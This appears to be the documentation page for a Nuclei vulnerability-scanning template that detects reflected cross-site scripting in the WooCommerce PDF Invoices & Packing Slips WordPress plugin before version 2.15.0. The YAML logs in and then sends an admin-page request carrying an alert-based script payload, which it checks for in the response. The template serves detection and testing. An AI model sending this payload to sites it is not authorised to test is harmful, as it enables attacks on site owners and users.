WordPress WooCommerce PDF Invoices & Packing Slips <2.15.0 - Cross-Site Scripting
ID: woocommerce-pdf-invoices-xss
Severity: medium
Author: Akincibor
Tags: xss,wp,wordpress,woocommerce,authenticated,wpscan,wp-plugin
Description
Section titled “Description”WordPress WooCommerce PDF Invoices & Packing Slips 2.15.0 does not escape some URLs before outputting them in attributes, leading to reflected cross-site scripting.
YAML Source
Section titled “YAML Source”id: woocommerce-pdf-invoices-xss
info: name: WordPress WooCommerce PDF Invoices & Packing Slips <2.15.0 - Cross-Site Scripting author: Akincibor severity: medium description: WordPress WooCommerce PDF Invoices & Packing Slips 2.15.0 does not escape some URLs before outputting them in attributes, leading to reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/bc05dde0-98a2-46e3-b2c8-7bdc8c32394b - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 metadata: max-request: 2 tags: xss,wp,wordpress,woocommerce,authenticated,wpscan,wp-plugin
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=documents§ion=invoice&"><script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "><script>alert(document.domain)</script>" - "WooCommerce PDF Invoices" condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4b0a00483046022100aef76b80da3cf64ed7a14be1ba44845a77864a57d05578d0e211c485c09612e7022100d1869f5259c440cb59aa241b1c0b42b4379452640586667dfaf757323237e143:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml"